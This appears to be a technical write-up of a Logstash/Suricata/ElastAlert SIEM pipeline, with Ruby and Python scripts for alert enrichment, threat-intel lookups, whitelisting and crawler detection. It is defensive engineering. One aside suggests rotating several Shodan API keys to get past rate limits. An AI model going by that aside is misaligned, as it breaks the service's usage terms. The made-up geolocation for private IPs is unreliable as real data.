dst_port = event.get('[destination][port]').to_s
rule_name = event.get('[related][rule][name]')[0].to_s

rule_description = src_ip + ':' + src_port + ' -> ' + dst_ip + ':' + dst_port + ' -> ' + rule_name
event.set('[rule][description]', rule_description)

if event.get('[related][rule][id]') then
sid = event.get('[related][rule][id]')[0]
event.set('[rule][uuid]', sid)
end

event.set('[rule][category]', 'Frequency')
"
}
}
}

2. Enrichment

image-20201208110506481


2.1 enrichment_alert_to_siem

Enrichment of alert events, i.e. the raw security events emitted by the sensors; see the blue lines in the figure above.

2.1.1 enrichment-alert_direction_for_suricata

For reasons specific to our environment, I had to set EXTERNAL_NET = any in suricata.yaml. That loosens the direction constraint on rules and caused some Suricata false positives, so I added a filtering layer in Logstash before the data is written to the SIEM.

Logstash Config
filter {
if [rule][description] {
ruby {
path => "/etc/logstash/scripts/add_direction.rb"
}
}
}
Ruby Code
  • enrichment-alert_direction_for_suricata.rb
    • Drops security events whose triggering IPs do not match the direction declared in the rule
    • Adds direction and zone fields so analysts can immediately tell internal-to-internal from internal-to-external alerts (a small illustration follows the script below)
require "ipaddr"


def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")
if not src_ip or not dst_ip then
event.cancel
return []
end
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip

# Sample: alert http $EXTERNAL_NET any -> $HOME_NET any
rule = event.get("[rule][description]")
src_direction = rule.split(" ")[2]
dst_direction = rule.split(" ")[5]

src_private = ipaddr_src.private?()
dst_private = ipaddr_dst.private?()

if event.get("provider") == "Suricata" then
if ( src_private ) and ( src_direction == "$EXTERNAL_NET" ) then
event.cancel
return []
end

if ( dst_private ) and ( dst_direction == "$EXTERNAL_NET" ) then
event.cancel
return []
end
end

if src_private and dst_private then
direction = "outbound"
zone = "internal"
elsif src_private and not dst_private then
direction = "outbound"
zone = "internal"
elsif not src_private and dst_private then
direction = "inbound"
zone = "external"
else
direction = "inbound"
zone = "external"
end

event.set("[network][direction]", direction)
event.set("[network][zone]", zone)
return [event]
end
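
Note that the four direction/zone branches above collapse to a single test on whether the source IP is private. A minimal Python equivalent, using the standard ipaddress module instead of Ruby's IPAddr (sample addresses are made up):

```python
import ipaddress

src = ipaddress.ip_address("192.168.199.10")   # hypothetical source
dst = ipaddress.ip_address("8.8.8.8")          # hypothetical destination

# Same outcome as the Ruby script: a private source means outbound/internal,
# a public source means inbound/external, regardless of the destination.
if src.is_private:
    direction, zone = "outbound", "internal"
else:
    direction, zone = "inbound", "external"

print(direction, zone)  # outbound internal
```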

​ To make later correlation analysis easier, a field linking the attacker to the domain is added.

Logstash Config
filter {
if [url][domain] {
ruby {
code => "
source_ip = event.get('[source][ip]')
url_domain = event.get('[url][domain]')
event.set('[related][domain]', [source_ip, url_domain])
"
}
}
}

2.1.3 add_geo-private_ip

​ Adds geolocation labels to intranet IPs, mainly so that asset coordinates show up on the Dashboard map 😂. Since these are not public IPs, GeoIP lookups cannot be used, so the Translate plugin is used here instead.

Logstash Config
filter {
translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_geo.yml"
field => "[source][ip]"
destination => "translation_geo"
}

json {
source => "translation_geo"
target => "[source][geo]"
skip_on_invalid_json => true
}

translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_asn.yml"
field => "[source][ip]"
destination => "translation_as"
}

json {
source => "translation_as"
target => "[source][as]"
skip_on_invalid_json => true
}

mutate {
remove_field => [ "translation_geo", "translation_as" ]
}
}

filter {
translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_geo.yml"
field => "[destination][ip]"
destination => "translation_geo"
}

json {
source => "translation_geo"
target => "[destination][geo]"
skip_on_invalid_json => true
}

translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_asn.yml"
field => "[destination][ip]"
destination => "translation_as"
}

json {
source => "translation_as"
target => "[destination][as]"
skip_on_invalid_json => true
}

mutate {
remove_field => [ "translation_geo", "translation_as" ]
}
}
Yaml
'192.168.199.\d+': '{"location":{"lat":45.8491,"lon":-119.7143},"country_name":"China","country_iso_code":"CN","region_name":"Jiangsu","region_iso_code":"JS","city_name":"Nanjing"}'
'192.168.199.\d+': '{"number":4134,"organization.name":"CHINANET-BACKBONE"}'
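
A small sanity check, assuming the two dictionary files above live at the paths referenced in the Logstash config: load the YAML, regex-match an intranet IP the way the translate filter does, and confirm the payload parses as JSON.

```python
import json
import re

import yaml  # PyYAML, assumed installed

ip = "192.168.199.23"  # hypothetical intranet address
for path, target in [("/etc/logstash/scripts/private_ip_geo.yml", "geo"),
                     ("/etc/logstash/scripts/private_ip_asn.yml", "as")]:
    with open(path) as f:
        dictionary = yaml.safe_load(f)
    for pattern, value in dictionary.items():
        if re.match(pattern, ip):
            print(target, json.loads(value))  # what will land in [source][geo] / [source][as]
            break
```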
Example

image-20201209110617996

image-20201208153642680


2.1.4 add_geo-public_ip

​ Public IPs are much easier: just load the GeoIP databases directly.

Logstash Config
filter {
if ! [source][geo] {
geoip {
source => "[source][ip]"
target => "[source][geo]"
fields => ["city_name", "country_name", "country_code2", "region_name", "region_code", "location"]
database => "/etc/logstash/GeoLite2-City.mmdb"
}

geoip {
source => "[source][ip]"
target => "[source][as]"
fields => ["autonomous_system_organization", "autonomous_system_number"]
database => "/etc/logstash/GeoLite2-ASN.mmdb"
default_database_type => "ASN"
}
}
}

filter {
if ! [destination][geo] {
geoip {
source => "[destination][ip]"
target => "[destination][geo]"
fields => ["city_name", "country_name", "country_code2", "region_name", "region_code", "location"]
database => "/etc/logstash/GeoLite2-City.mmdb"
}

geoip {
source => "[destination][ip]"
target => "[destination][as]"
fields => ["autonomous_system_organization", "autonomous_system_number"]
database => "/etc/logstash/GeoLite2-ASN.mmdb"
default_database_type => "ASN"
}
}
}

filter {
mutate {
rename => ["[source][geo][country_code2]", "[source][geo][country_iso_code]"]
rename => ["[source][geo][region_code]", "[source][geo][region_iso_code]"]
rename => ["[source][as][asn]", "[source][as][number]"]
rename => ["[source][as][as_org]", "[source][as][organization.name]"]
rename => ["[destination][geo][country_code2]", "[destination][geo][country_iso_code]"]
rename => ["[destination][geo][region_code]", "[destination][geo][region_iso_code]"]
rename => ["[destination][as][asn]", "[destination][as][number]"]
rename => ["[destination][as][as_org]", "[destination][as][organization.name]"]

remove_tag => [ "_geoip_lookup_failure" ]
}
}

2.2 enrichment-alarm_from_siem

​ Enriches alarm events, i.e. the data emitted by the SIEM. See the part marked by the red line in the figure above.

​ A hunting capability is added to SIEM alarms: with it you can trace back directly to every alert event that triggered the alarm.

Logstash Config
filter {
if [event][kind] == "alarm" and [related][event][log] {
ruby {
path => "/etc/logstash/scripts/add_related_event_id.rb"
}
}
}
Ruby Code
require "json"


def register(params)
@pattern = /(?:\\n)?\w+ \d+ \d+:\d+:\d+ logstash NORMALIZED\[-\]: /
end

def filter(event)
event_id = []
rule_id = []
rule_name = []
event_log = event.get('[related][event][log]')

atomic_rules = event_log.split(@pattern)[1 .. -1]
for atomic in atomic_rules do
e_id = JSON.parse(atomic)['event']['id']
r_id = JSON.parse(atomic)['rule']['id']
r_name = JSON.parse(atomic)['rule']['name']

event_id.push(e_id)
rule_id.push(r_id)
rule_name.push(r_name)
end
event.set('[related][event][id]', event_id)
event.set('[related][rule][id]', rule_id)
event.set('[related][rule][name]', rule_name)
event.remove('[related][event][log]')

return [event]
end
Example

​ Below is a Wazuh aggregated alarm; by clicking the threat.hunting.event.id field an analyst can trace back to the underlying alert events that triggered the aggregation rule.

image-20201204175051910

image-20201204175244182


3. Threat Intelligence

threat-intelligence

3.1 threatIntel_alert_to_siem

​ Logstash loads a Ruby script that pushes IoCs to Redis. To avoid duplicate pushes, each IoC is given an expiry time (7 days by default). See the part marked by the blue line in the figure above.

3.1.1 add-ti_shodan

​ For any IP address that has attacked us, we probe it back with Shodan and collect the attacker's (or the zombie host's) asset information for analysts to use later. Because each IoC already has an expiry time, it is not pushed again before it expires. Of course, the API call rate of a single key still needs throttling, though you can always use more than one key. You know what I mean 😈 (A sketch of such an external Shodan worker follows the Ruby script below.)

Logstash Config
filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-ti_shodan.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"

"ti_db" => 1
"alert_prefix" => "alert:"
"expire" => 86400

"spider_db" => 5
"spider_key" => "spider:shodan:ioc"
}
}
}
}
Ruby Code
require "json"
require "redis"
require "ipaddr"

def register(params)
@expire = params["expire"]
@alert = params["alert_prefix"]
@alarm = params["alarm_prefix"]
@spider_key = params["spider_key"]

# connect to redis
@ti_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["ti_db"])
@spider_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["spider_db"])
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

begin
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip
rescue Exception => e
event.cancel
return []
end

if not ipaddr_src.private?() then
ioc = src_ip
elsif not ipaddr_dst.private?() then
ioc = dst_ip
else
return [event]
end

if event.get("[event][kind]") == "alert" then
alert_ioc = @alert + ioc
if not @ti_redis.exists?(alert_ioc) then
@ti_redis.setex(alert_ioc, @expire, true)
@spider_redis.lpush(@spider_key, ioc)
end
end

return [event]
end
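
As mentioned above, the external "spider" worker itself is not part of this post. Here is a hedged Python sketch of what it might look like: it pops IoCs from spider:shodan:ioc (db 5) and caches the fields that ti_shodan.rb in section 3.2.1 later reads from alarm:<ip> (db 1). Key names and the field layout are inferred from the Logstash scripts, not authoritative; the API key is a placeholder.

```python
import json

import redis
import shodan  # official "shodan" client library, assumed installed

API_KEY = "YOUR_SHODAN_API_KEY"  # hypothetical placeholder

results = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=1)
queue = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=5)
api = shodan.Shodan(API_KEY)

while True:
    _, raw_ioc = queue.brpop("spider:shodan:ioc")   # blocking pop from the spider queue
    ip = raw_ioc.decode()
    try:
        host = api.host(ip)                         # Shodan host lookup
    except shodan.APIError:
        continue
    modules = {s.get("_shodan", {}).get("module") for s in host.get("data", [])}
    data = {
        "services": sorted(m for m in modules if m),
        "vulns": host.get("vulns", []),
        "ports": host.get("ports", []),
        "hostnames": host.get("hostnames", []),
        "domains": host.get("domains", []),
    }
    results.set("alarm:" + ip, json.dumps(data))    # consumed by ti_shodan.rb
```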

3.2 threatIntel_alarm_from_siem

​ Logstash enriches the alarms with threat-intelligence data. See the part marked by the red line in the figure above.

3.2.1 add-ti_tags_from_shodan

​ Enriches alarms with Shodan IoC intelligence.

Logstash Config
filter {
if [event][kind] == "alarm" {
ruby {
path => "/etc/logstash/scripts/ti_shodan.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"ti_db" => 1
"alarm_prefix" => "alarm:"
}
}
}
}
Ruby Code
require "json"
require "redis"
require "ipaddr"

def register(params)
@alarm = params["alarm_prefix"]
# connect to redis
@ti_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["ti_db"])
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

begin
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip
rescue Exception => e
event.cancel
return []
end

if not ipaddr_src.private?() then
ioc = src_ip
elsif not ipaddr_dst.private?() then
ioc = dst_ip
else
return [event]
end

raw_data = @ti_redis.get(@alarm + ioc)
if raw_data then
data = JSON.parse(raw_data)
if data then
event.set("[threat][hunting][services]", data["services"])
event.set("[threat][hunting][vulns]", data["vulns"])
event.set("[threat][hunting][ports]", data["ports"])
event.set("[threat][hunting][hostnames]", data["hostnames"])
event.set("[threat][hunting][domains]", data["domains"])
if data["details"] then
details = data["details"].to_json
event.set("[threat][hunting][details]", details)
end
end
end

return [event]
end
Example
{
"threat": {
"hunting": {
"vulns": [
"CVE-2019-0220",
"CVE-2019-0197",
"CVE-2019-0196",
"CVE-2018-1302",
"CVE-2019-0211",
"CVE-2017-15710",
"CVE-2018-1301",
"CVE-2018-1283",
"CVE-2018-1303",
"CVE-2017-15715",
"CVE-2018-1333",
"CVE-2018-17199",
"CVE-2018-11763",
"CVE-2018-1312"
],
"domains": [],
"ports": [
8888,
80,
8080,
8090,
22
],
"details": "{\"tcp\":[{\"http-simple-new\":8888,\"Apache httpd\":\"2.4.29\"},{\"http\":80,\"Apache httpd\":\"2.4.29\"},{\"http\":8080,\"Apache httpd\":\"2.4.29\"},{\"http-simple-new\":8090},{\"ssh\":22,\"OpenSSH\":\"7.6p1 Ubuntu-4ubuntu0.3\"}],\"udp\":[]}",
"hostnames": [],
"services": [
"http-simple-new",
"ssh",
"http"
]
}
}
}

image-20201205151011258

image-20201205150744102

3.2.2 add-ti_tags

​ This part usually hooks into our own intelligence (we collect the IPs that have attacked us and build internal intelligence tailored to us) as well as open-source intelligence. In principle the SIEM does not produce many alarm events, so here the intelligence is fetched directly from Elastic to enrich the alarms. If you have a large alarm volume, consider keeping the data in Redis or another scheme instead. We are about to purchase commercial intelligence, so an integration step for it will follow later.

Logstash Config
filter {
if [event][kind] == "alarm" {
ruby {
path => "/etc/logstash/scripts/siem-ti_tags.rb"
script_params => {
"index" => "ecs-ti-*"
"urls" => "https://elastic:HelloWorld@127.0.0.1:9200"
"ca" => "ca.crt"
}
}
}
}
Ruby Code
require 'json'
require 'elasticsearch'

def register(params)
@urls = params["urls"]
@index = params["index"]
@ca = params["ca"]
@client = Elasticsearch::Client.new urls: @urls, transport_options: { ssl: { ca_file: @ca } }
end

def filter(event)
ioc = event.get('[source][ip]')
query = {
"_source": {
"includes": [
"threat.tags",
"threat.provider"
]
},
"query": {
"bool": {
"must": [
{
"terms": {
"threat.type": [
"ipv4",
"ip"
]
}
},
{
"term": {
"threat.ioc": ioc
}
}
],
"filter": [
{
"range": {
"threat.creation_time": {
"gte": "now-7d"
}
}
}
]
}
},
"size": 10
}
response = @client.search index: @index, body: query.to_json

tags = []
providers = []
if not response['hits']['hits'].empty? then
response['hits']['hits'].each do |result|
if not providers.include?(result["_source"]["threat"]["provider"])
providers.push(result["_source"]["threat"]["provider"])
end
tags = tags - result["_source"]["threat"]["tags"]
tags = tags + result["_source"]["threat"]["tags"]
end
end

event.set('[threat][intelligence][tags]', tags)
event.set('[threat][intelligence][providers]', providers)
return [event]
end
Example

image-20201208144650226

{
"threat": {
"intelligence": {
"providers": [
"NTA"
],
"tags": [
"WebAttack"
]
}
}
}

4. Filter

image-20201207153152332

4.1 alert_to_siem

4.1.1 filter_ip_from_alert

​ In practice some whitelisted IPs and specific signature rules need to be filtered out, both to protect SIEM performance and to keep the alarms reliable. The filtered data is still shipped to Elastic as historical data, but it is not consumed by the SIEM and raises no alarms. (A sketch of how the whitelist sets might be populated follows the Ruby script below.)

Logstash Config

​ The Clone plugin is used so that the copy of the data destined for the SIEM is filtered by the script.

filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-filter_ip.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"cdn_db" => 3
"scan_db" => 4
}
}
}
}
Ruby Code
require "redis"


def register(params)
begin
@cdn_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["cdn_db"])
@scan_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["scan_db"])
rescue
return
end
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

if @cdn_db.exists?(src_ip) || @cdn_db.exists?(dst_ip) || @scan_db.exists?(src_ip) || @scan_db.exists?(dst_ip) then
event.cancel
return []
end

return [event]
end
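
As mentioned above, a purely hypothetical example of how the CDN and scanner whitelist sets consumed by siem-filter_ip.rb might be maintained. The script only checks key existence with exists?, so a bare IP key with any value is enough; the addresses and TTL below are made up.

```python
import redis

cdn_db = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=3)
scan_db = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=4)

for ip in ("151.101.1.69", "151.101.65.69"):          # hypothetical CDN addresses
    cdn_db.set(ip, "cdn")                             # value is informational only
scan_db.setex("10.10.1.100", 7 * 86400, "scanner")    # internal scanner, expires after 7 days
```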
4.1.2 filter_sid_from_alert
Logstash Config
filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-filter_sid.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"sid_db" => 2
}
}
}
}
Ruby Code
require "redis"


def register(params)
@signature_id = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["sid_db"])
end

def filter(event)
sid = event.get("[rule][id]")
if @signature_id.exists?(sid) then
event.cancel
return []
end
return [event]
end

4.2 alarm_from_siem

4.2.1 update_action_from_alarm

​ For events matching the specified rule.id, update event.action to block so they can later be "consumed" by the SIEM response module. See the part marked by the red line in the figure above. The goal is to use the event.action field to distinguish automated actions taken by the SIEM.

Logstash Config

​ For the specified rule.id events, the default value allowed is replaced with block so the response module can act on them later.

filter {
mutate {
update => {
"[event][action]" => "allowed"
}
}

ruby {
path => "/etc/logstash/scripts/siem-update_action.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"siem_action_db" => 7
}
}
}
Ruby Code
require "redis"


def register(params)
begin
@siem_action_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["siem_action_db"])
rescue
return
end
end


def filter(event)
rule_id = event.get("[rule][id]")

if @siem_action_db.exists?(rule_id) then
event.set("[event][action]", "block")
end

return [event]
end
Example:

image-20201207111416997


3. Dashboards

SIEM alarm dashboard

SIEM-Alarm

Security event dashboard (for incident tracing)

SIEM Alert

Sensitive API monitoring

image-20201214112856076

Background

XXX


Shortcomings of SIEM v0.2

XXX


Improvements in SIEM v0.3

1. Workflow

XXX


2. Normalized

Workflow

image-20220218183243830

Configure

| No | File | Script | Log | Note |
| --- | --- | --- | --- | --- |
| 1 | 60_normalized-general.conf | | | |
| 2 | 61_normalized-alert.conf | | | |
| 3 | 62_normalized-flow.conf | | | |
| 4 | 63_normalized-fileinfo.conf | | | |
| 5 | 64_normalized-http.conf | 64_normalized-http.rb | 64_normalized-http.log | |
| 6 | 65_normalized-tls.conf | | | |

3. Enrichment

Workflow

image-20220221134544143

Configure

| No | File | Script | Log | Note |
| --- | --- | --- | --- | --- |
| 1 | 70_enrichment-general-geo-1-private_ip.conf | | | |
| 2 | 70_enrichment-general-geo-2-public_ip.conf | | | |
| 3 | 71_enrichment-alert-1-direction.conf | 71_enrichment-alert-1-direction.rb | | |
| 4 | 71_enrichment-alert-2-killChain.conf | 71_enrichment-alert-2-killChain.rb | 71_enrichment-alert-2-killChain.log | |
| 5 | 71_enrichment-alert-3-cve.conf | 71_enrichment-alert-3-cve.rb | 71_enrichment-alert-3-cve.log | |
| 6 | 71_enrichment-alert-4-whitelist_ip.conf | 71_enrichment-alert-4-whitelist_ip.rb | 71_enrichment-alert-4-whitelist_ip.log | **** |

KillChain

Suricata

Input

  • Redis template
# key: str killchain:{provider}:{rule id}
# value: json str {"steps"=>{KillChain steps}, "description"=>{KillChain description}, "class"=>{rule class}}

localhost:6379> set killchain:suricata:2028933 '{"steps": 4, "description": "Exploitation", "class": "exploit"}'

Output

{
"threat": {
"killchain": {
"steps": 1,
"description": "侦查跟踪",
"class": "scan"
}
}
}
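
A minimal sketch of the enrichment step implied by the Redis template above: look up killchain:{provider}:{rule id} and copy the JSON into threat.killchain. This is not the actual 71_enrichment-alert-2-killChain.rb script, just an illustration of the key/value contract; the connection details, db number and sample event are placeholders.

```python
import json

import redis

r = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=1)  # db is an assumption

event = {"provider": "suricata", "rule": {"id": 2028933}, "threat": {}}
raw = r.get("killchain:%s:%s" % (event["provider"], event["rule"]["id"]))
if raw:
    # e.g. {"steps": 4, "description": "Exploitation", "class": "exploit"}
    event["threat"]["killchain"] = json.loads(raw)
print(event)
```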
Imperva

Vulnerability

Input

  • Redis template
# key: str enrichment:{class}:{cve}
# value: str {create time create user}

localhost:6379> set enrichment:cve:CVE-2016-8618 '2022-02-16 Canon'

Output

{
"rule": {
"cve": "CVE-2015-9381" // none
},
"vulnerability": {
"id": "CVE-2015-9381",
"enumeration": "CVE"
}
}

4. ThreatIntel

Workflow

image-20220221105601713

Configure

Shodan

| No | File | Script | Log | Note |
| --- | --- | --- | --- | --- |
| 1 | 85_threatintel-siem-event-1-shodan.conf | 85_threatintel-siem-event-1-shodan.rb | | |

Input

  • Redis template
# key: list spider:{provider}:ioc
# value: str ioc

localhost:6379> LPUSH spider:shodan:ioc 8.8.8.8 # Spider Queue
localhost:6379> SETEX alert:8.8.8.8 86400 true # IoC Cache

Output

{
"source": {
"ip": "84.17.52.20"
},
"threat": {
"hunting": {
"details": {
"tcp": [
{
"http-simple-new": 81
},
{
"https": 443
},
{
"http-simple-new": 8080
},
{
"https-simple-new": 8081
},
{
"https": 8443
},
{
"https-simple-new": 9002
}
],
"udp": []
},
"domains": "cdn77.com",
"hostnames": "unn-84-17-52-20.cdn77.com",
"ports": [
8443,
8081,
9002,
8080,
81,
443
],
"services": [
"https",
"https-simple-new",
"http-simple-new"
]
}
}
}

3. Filter

3.1 Whitelist

3.1.1 IP

  • Redis template

Input

# key: str whitelist:{class}:{ip}
# value: json str {"type": "cdn", "action": "pass|drop"}

localhost:6379> set whitelist:ip:8.8.8.8 '{"type": "cdn", "action": "pass"}'

Output

{
"source": {
"ip": "x.x.x.x"
},
"whitelist": {
"type": "cdn", // 描述白名单类型,如:CDN、红队测试IP、办公网出口IP
"action": "drop", // drop|pass 事件是否需要进入SIEM消费
"origin": "source" // source|destination 描述实际匹配到白名单来源是"source"还是"destination"
},
"isWhitelist": true // 仅作为筛选条件
}
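
A hedged sketch of the v0.3 whitelist lookup described above: check both ends of the connection against whitelist:ip:<ip> and record which side matched. The Redis db number and the sample event are assumptions, not the deployed script.

```python
import json

import redis

r = redis.Redis(host="127.0.0.1", port=6379, password="HelloWorld", db=0)  # db is an assumption

event = {"source": {"ip": "8.8.8.8"}, "destination": {"ip": "10.0.0.5"}}
for origin in ("source", "destination"):
    raw = r.get("whitelist:ip:" + event[origin]["ip"])
    if raw:
        entry = json.loads(raw)
        event["whitelist"] = {"type": entry["type"], "action": entry["action"], "origin": origin}
        event["isWhitelist"] = True   # only used as a filter flag downstream
        break
print(event)
```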

Differences

  • v0.2
{
"source": {
"ip": "x.x.x.x",
"isWhitelist": true,
"whitelistType": "exit_whitelist"
},
"destination.": {
"ip": "y.y.y.y",
"isWhitelist": true,
"whitelistType": "exit_whitelist"
}
}
  • v0.3
{
"source": {
"ip": "x.x.x.x"
},
"whitelist": {
"type": "cdn",
"action": "drop",
"origin": "source"
},
"isWhitelist": true
}

3.1.2 Rule

3.1.2.1 SID
  • Redis template

Input

# key: str whitelist:{class}:{provider}:{rule id}
# value: str {rule name}

localhost:6379> set whitelist:sid:suricata:2101201 "GPLWEB_SERVER_403_Forbidden"

Workflow

image-20220224143316558

Input

  • Redis template
# key: str whitelist:{class}:{provider}:{rule name}
# value: str add by {user} {date} {sid} # default

# Suricata
localhost:6379> set "whitelist:rule:suricata:GPLWEB_SERVER_403_Forbidden" "add by Canon 2022.02.24 2101201"
# Imperva
localhost:6379> set "whitelist:rule:imperva:Suspicious Response Code" "add by Canon 2022.02.24"

Workflow

image-20220224150916372

Background

​ Because of the particularities of AWS traffic mirroring, only HTTP and DNS traffic is currently fed into the production architecture; Zeek and Suricata analyze and alert on it. Suricata handles signature-based detection, Zeek handles script-based detection of custom events, so each has its own job. A few days ago one business API started firing Pingdom alerts; analysis showed that several IPs were enumerating one of its parameters. Because the enumerated values were all very large and the backend imposed no deeper limit on the parameter, the server kept computing until the API stopped responding.

Requirements

  • Detect parameter-enumeration behavior;
  • Determine whether the accesses are periodic;
  • Count unique user_agent values;
  • Triage against threat intelligence;

Implementation

​ The requirements above are implemented by extending the alert model of the **ElastAlert** alerting framework.

Parameter enumeration
  • New rule - Spider.py
import sys
import json
import redis
import html
import datetime
from multiprocessing import Process, JoinableQueue, Lock, Manager

from elastalert.ruletypes import RuleType
from elastalert.util import elastalert_logger

try:
import pandas as pd
except:
print("Please make sure you have pandas installed. pip install pandas")
sys.exit(0)

try:
from tqdm import tqdm
except:
print("Please make sure you have tqdm module installed. pip install tqdm")
sys.exit(0)


def conn(host='localhost', port=6379, password=None, db=0):
pool = redis.ConnectionPool(host=host, port=port, password=password, db=db)
conn = redis.Redis(connection_pool=pool)
return conn


def put_data(conn, q, data):
with conn.pipeline() as pipe:
for i in data:
pipe.lpush(q, i)
pipe.execute()


class SpiderRule(RuleType):
def __init__(self, rules, args=None):
super(SpiderRule, self).__init__(rules, args=None)
self.MAX_ARGS_LENGTH = int(self.rules['beacon']['max_args_length'])
self.MIN_HITS = int(self.rules['beacon']['min_hits'])
self.MAX_UNIQUE_ARGS = int(self.rules['beacon']['max_unique_args'])
self.THRESHOLD_PERCENT = int(self.rules['beacon']['threshold_percent'])
self.NUM_PROCESSES = int(self.rules['beacon']['threads'])
self.UA_PROCESSES = int(self.rules['beacon']['user_agent'])

self.TIMESTAMP = '@timestamp'
self.FORMAT_TIMESTAMP = self.rules['timestamp'].get('format', None)

self.beacon_module = self.rules['beacon']['beacon_module']
self.WINDOW = int(self.rules['beacon']['window'])
self.MIN_INTERVAL = int(self.rules['beacon']['min_interval'])
buffer_time = str(self.rules['buffer_time'])
self.PERIOD = ':'.join(buffer_time.split(':')[:2])

self.fields = self.normalized_field(self.rules['field'])
self.src_ip = self.fields['aliases']['src_ip']
self.url = self.fields['aliases']['url']
self.url_path = self.fields['aliases']['url_path']
self.http_host = self.fields['aliases']['http_host']
self.user_agent = self.fields['aliases']['user_agent']

self.json = self.rules['output']['json'].get('enable', None)
self.redis = self.rules['output']['redis'].get('enable', None)

self.q_job = JoinableQueue()
self.l_df = Lock()
self.l_list = Lock()

def normalized_field(self, d):
fields = {'hash': [], 'output': [], 'aliases': {}}
for field, info in d.items():
alias = info['alias']
fields['aliases'][alias] = field
for i in info.get('type', []):
fields[i].append(field)
return fields

def add_data(self, data):
# Detection of spider crawlers
self.df = pd.json_normalize(data)
results = self.find_spiders()

d = results.to_dict(orient="records")

# Output to local files
if self.json:
json_path = self.rules['output']['json']['path']
with open(json_path, 'a') as out_file:
for i in d:
out_file.write(json.dumps(i) + '\n')

# Output to Redis Server
if self.redis:
try:
host = self.rules['output']['redis']['host']
port = self.rules['output']['redis']['port']
password = self.rules['output']['redis']['password']
db = self.rules['output']['redis']['db']
key = self.rules['output']['redis']['key']
ioc = self.rules['output']['redis']['field']

redis_conn = conn(host=host, port=port,
password=password, db=db)
IoC = results[ioc].unique().tolist()
put_data(redis_conn, key, IoC)
except:
elastalert_logger.error("Output Redis configuration errors.")
self.add_match(d)

# The results of get_match_str will appear in the alert text
def get_match_str(self, match):
return json.dumps(match)

def add_match(self, results):
for result in results:
super(SpiderRule, self).add_match(result)

def get_args_hash(self, args, session_id):
return hash(tuple(args + [session_id]))

def get_query_str(self, request):
query = request.split('?')[-1]
query_str = dict([i.split("=", 1) for i in query.split(
"&") if i if len(i.split("=", 1)) == 2])
query_str['args_list'] = list(query_str.keys())
query_str['max_length'] = len(query_str)
query_str['url_sample'] = request
return query_str

def percent_grouping(self, d, total):
interval = 0
# Finding the key with the largest value (interval with most events)
mx_key = int(max(iter(list(d.keys())), key=(lambda key: d[key])))
mx_percent = 0.0

for i in range(mx_key - self.WINDOW, mx_key + 1):
current = 0
# Finding center of current window
curr_interval = i + int(self.WINDOW / 2)

for j in range(i, i + self.WINDOW):
if j in d:
current += d[j]

percent = float(current) / total * 100
if percent > mx_percent:
mx_percent = percent
interval = curr_interval

return interval, mx_percent

def find_beacon(self, session_data):
beacon = {}

if not self.FORMAT_TIMESTAMP:
session_data[self.TIMESTAMP] = pd.to_datetime(
session_data[self.TIMESTAMP])
else:
session_data[self.TIMESTAMP] = pd.to_datetime(
session_data[self.TIMESTAMP], format=self.FORMAT_TIMESTAMP)
session_data[self.TIMESTAMP] = (
session_data[self.TIMESTAMP].astype(int) / 1000000000).astype(int)

session_data = session_data.sort_values([self.TIMESTAMP])
session_data['delta'] = (
session_data[self.TIMESTAMP] - session_data[self.TIMESTAMP].shift()).fillna(0)
session_data = session_data[1:]
d = dict(session_data.delta.value_counts())

for key in list(d.keys()):
if key < self.MIN_INTERVAL:
del d[key]

# Finding the total number of events
total = sum(d.values())
if d and total > self.MIN_HITS:
window, percent = self.percent_grouping(d, total)
if percent > self.THRESHOLD_PERCENT and total > self.MIN_HITS:
beacon = {
'percent': int(percent),
'interval': int(window),
}

return beacon

def find_spider(self, q_job, spider_list):
while not q_job.empty():
session_id = q_job.get()
self.l_df.acquire()
session_data = self.df[self.df['session_id']
== session_id]
self.l_df.release()

query_str = session_data[self.url].apply(
lambda req: self.get_query_str(req)).tolist()
query_data = pd.DataFrame(query_str)

# get args_hash
query_data['args_hash'] = query_data['args_list'].apply(
lambda args: self.get_args_hash(args, session_id))

for i in query_data['args_hash'].unique():
result = {
"detail": {
'percent': {},
'unique': {}
},
"tags": [],
"src_ip": session_data[self.src_ip].tolist()[0],
"url_path": session_data[self.url_path].tolist()[0],
"http_host": session_data[self.http_host].tolist()[0],
